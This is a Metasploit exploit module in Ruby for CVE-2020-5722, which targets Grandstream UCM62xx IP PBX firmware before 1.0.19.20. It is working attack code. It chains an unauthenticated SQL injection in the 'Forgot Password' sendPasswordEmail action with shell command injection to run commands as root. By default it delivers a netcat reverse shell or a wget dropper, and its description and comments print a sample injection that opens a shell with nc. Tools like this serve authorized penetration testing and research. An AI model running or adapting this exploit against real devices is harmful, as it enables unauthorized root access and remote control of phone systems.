Grandstream UCM62xx IP PBX sendPasswordEmail RCE

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE',
        'Description' => %q{
          This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
          a command injection vulnerability (technically, no assigned CVE but was inadvertently
          patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
          series of devices. The vulnerabilities allow an unauthenticated remote attacker to
          execute commands as root.

          Exploitation happens in two stages:

          1. An SQL injection during username lookup while executing the "Forgot Password" function.
          2. A command injection that occurs after the user provided username is passed to a Python script
          via the shell. Like so:

          /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
          password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `

          This module affect UCM62xx versions before firmware version 1.0.19.20.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module
        ],
        'References' => [
          [ 'CVE', '2020-5722' ],
          [ 'EDB', '48247']
        ],
        'DisclosureDate' => '2020-03-23',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'Payload' => {
                'DisableNops' => true,
                'BadChars' => '\'&|'
              },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'wget' ]
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => {
          'RPORT' => 8089,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  ##
  # Sends a POST /cgi request with a payload of action=getInfo. The
  # server should respond with a large json blob like the following,
  # where "prog_version" is he firmware version:
  #
  # {"response"=>{
  #   "model_name"=>"UCM6202", "description"=>"IPPBX Appliance",
  #   "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/",
  #   "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.",
  #    "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1",
  #    "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US",
  #    "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0",
  #    "support_webrtc_cloud"=>"0"}, "status"=>0}
  ###
  def check
    normalized_uri = normalize_uri(target_uri.path, '/cgi')
    vprint_status("Requesting version information from #{normalized_uri}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalized_uri,
      'vars_post' => { 'action' => 'getInfo' }
    })

    return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200

    body_json = res.get_json_document
    return CheckCode::Unknown('No JSON in response') unless body_json

    prog_version = body_json.dig('response', 'prog_version')
    return false if prog_version.nil?

    vprint_status("The reported version is: #{prog_version}")

    version = Rex::Version.new(prog_version)
    if version < Rex::Version.new('1.0.19.20')
      return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
    end

    return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")
  end

  ##
  # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection
  # and then it will get passed to a python script via sh which allows us to execute a command injection.
  # It will look something like this:
  #
  # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
  #     password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
  #
  # This functionality is related to the"Forgot Password" feature. This function is rate limited by
  # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few
  # payloads are appropriate.
  ###
  def execute_command(cmd, _opts = {})
    rand_num = Rex::Text.rand_text_numeric(1..5)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/cgi'),
      'vars_post' =>
      {
        'action' => 'sendPasswordEmail',
        'user_name' => "' or #{rand_num}=#{rand_num}--`;`#{cmd}`;`"
      }
    }, 5)

    # the netcat reverse shell payload holds the connection open. So we'll treat no response
    # as a success. The meterpreter payload does not hold the connection open so this clause digs
    # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload
    # generates an error (e.g. rate limit error)
    if res
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200

      body_json = res.get_json_document
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json

      status_json = body_json['status']
      fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json
      fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0
    end

    print_good('Exploit successfully executed.')
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end
end